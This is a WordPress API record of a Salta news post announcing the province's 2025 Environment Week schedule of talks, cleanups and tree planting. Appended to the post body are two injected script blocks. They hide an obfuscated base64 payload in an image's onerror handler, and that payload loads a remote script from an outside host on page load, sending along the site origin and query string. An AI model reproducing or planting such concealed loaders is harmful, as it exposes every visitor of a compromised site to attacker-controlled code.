{"id":5215,"date":"2025-06-02T10:27:05","date_gmt":"2025-06-02T13:27:05","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5215"},"modified":"2025-08-13T23:31:35","modified_gmt":"2025-08-14T02:31:35","slug":"semana-del-ambiente-en-salta-se-realizaran-charlas-capacitaciones-y-actividades-de-concientizacion","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5215","title":{"rendered":"Semana del Ambiente: en Salta se realizar\u00e1n charlas, capacitaciones y actividades de concientizaci\u00f3n"},"content":{"rendered":"\n<p class=\"has-white-color has-text-color has-background has-link-color wp-elements-6a573843c66b4e0f17052e7d270e36ca\" style=\"background-color:#8a0348\"><strong><em>Este lunes 2 de junio comienzan las actividades en nuestra provincia, y finalizar\u00e1n el viernes 6 de junio. Este a\u00f1o, el lema es \u00abSin Contaminaci\u00f3n por Pl\u00e1sticos\u00bb.<\/em><\/strong><\/p>\n\n\n\n<p>El D\u00eda Mundial del Ambiente se celebra el 5 de junio. En 2025 el pa\u00eds anfitri\u00f3n ser\u00e1 la Rep\u00fablica de Corea, y en todo el mundo, la tem\u00e1tica principal es un llamado a la acci\u00f3n para luchar contra la contaminaci\u00f3n pl\u00e1stica. En ese marco, la Secretar\u00eda de Ambiente y Desarrollo Sustentable de Salta organiz\u00f3 una serie de actividades que se llevar\u00e1n a cabo en distintos puntos de la provincia.<\/p>\n\n\n\n<p>El objetivo de las acciones planificadas por el Programa de Capacitaci\u00f3n y Educaci\u00f3n Ambiental, es promover en toda la ciudadan\u00eda la importancia de proteger el medio ambiente y nuestros recursos naturales. Tomando como punto de partida esa premisa, el cronograma de actividades es el siguiente:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Lunes 2 de junio &#8211; 9:00 &#8211; \u201cLlamado a Cuidar el Ambiente\u201d: las brigadas ambientales ser\u00e1n llamadas a iniciar un programa de limpieza de lugares estrat\u00e9gicos, y las instituciones invitadas a poner en marcha sus propios programas de Semana del Ambiente.<\/li>\n\n\n\n<li>\u00a0Martes 3 de junio &#8211; 15:00 a 16:30 &#8211; \u201cConciencia de la Importancia de la Econom\u00eda Circular\u201d: charlas de concientizaci\u00f3n con estudiantes. Se realizar\u00e1 en la Reserva Provincial Finca la Huella, Vaqueros.<\/li>\n\n\n\n<li>Mi\u00e9rcoles 4 de junio &#8211; 10:00 &#8211; \u201cLimpieza de Nuestros Cuerpos de Agua\u201d: se desarrollar\u00e1 la limpieza del perilago del Dique Las Lomitas, en conjunto con la Municipalidad y el Batall\u00f3n Medio Ambiental de Campo Quijano.<\/li>\n\n\n\n<li>Jueves 5 de junio &#8211; 10:00 &#8211; Casa de la Cultura de Cachi \u201cCapacitaci\u00f3n de Agentes Municipales\u201d: se capacitar\u00e1 en temas ambientales a referentes municipales de Angastaco, Animan\u00e1, Cachi, Cafayate, Molinos, Payogasta, San Carlos, y Seclant\u00e1s.<\/li>\n<\/ul>\n\n\n\n<p>&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;13:00 &#8211; Escuela T\u00e9cnica de Barrio Luj\u00e1n (Cachi) &#8211; \u201cSiembra de \u00c1rboles\u201d.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Viernes 6 de junio \u2013 10:00 a 12:00 \u2013 \u201cCompromiso Ambiental con los Ni\u00f1os\u201d: en Cachi, participaci\u00f3n de funcionarios provinciales en promesa ambiental con las escuelas y en las actividades por la Semana del Ambiente. Adem\u00e1s, habr\u00e1 una exposici\u00f3n de material reciclado por alumnos de las escuelas.<\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:&nbsp;<strong>Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Este lunes 2 de junio comienzan las actividades en nuestra provincia, y finalizar\u00e1n el viernes 6 de junio. Este a\u00f1o, el lema es \u00abSin Contaminaci\u00f3n por Pl\u00e1sticos\u00bb. El D\u00eda Mundial del Ambiente se celebra el 5 de junio. En 2025 el pa\u00eds anfitri\u00f3n ser\u00e1 la Rep\u00fablica de Corea, y en todo el mundo, la tem\u00e1tica [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5216,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[43],"tags":[],"class_list":{"0":"post-5215","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-ambiente-naturaleza"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5215"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5215"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5215\/revisions"}],"predecessor-version":[{"id":6475,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5215\/revisions\/6475"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5216"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5215"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5215"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5215"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}